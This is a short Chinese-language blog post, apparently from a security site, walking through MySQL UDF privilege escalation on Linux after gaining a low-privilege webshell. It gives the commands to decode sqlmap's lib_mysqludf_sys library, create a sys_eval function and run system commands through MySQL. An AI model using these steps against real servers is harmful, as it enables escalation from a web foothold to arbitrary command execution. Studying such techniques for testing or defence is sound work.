目录

udf提权(Linux系统)

321次围观   3个点赞   0人评论

作者头像

发表于 2022-08-20 00:49:33

udf提权(Linux系统)

321次围观   3个点赞   0人评论

作者头像

发表于 2022-08-20 00:49:33

如果我们拿到的webshell权限较低,但是如果mysql是以高权限运行的,我们可以用mysql udf提权。

拿到webshell后先弹个shell到msf

图片.png

拿到phpmyadmin的路径

图片.png

查一下插件路径


图片.png

对于udf文件,在sqlmap工具中自带就有,只要找对应操作系统的版本即可

我们要对udf文件进行解码

cd /usr/share/sqlmap/extra/cloak/ 
python cloak.py -d -i /usr/share/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_

其中,lib_mysqludf_sys.so_是原文件,lib_mysqludf_sys.so是解码后的文件

图片.png

把lib_mysqludf_sys.so传到插件目录

图片.png

利用第上传的lib_mysqludf_sys.so文件,创建一个MySQL函数sys_eval

create function sys_eval returns string soname "lib_mysqludf_sys.so"

执行系统命令

select sys_eval('whoami')


图片.png

udf linux.rar


标签:
评论 (0)

请先登陆后再发表评论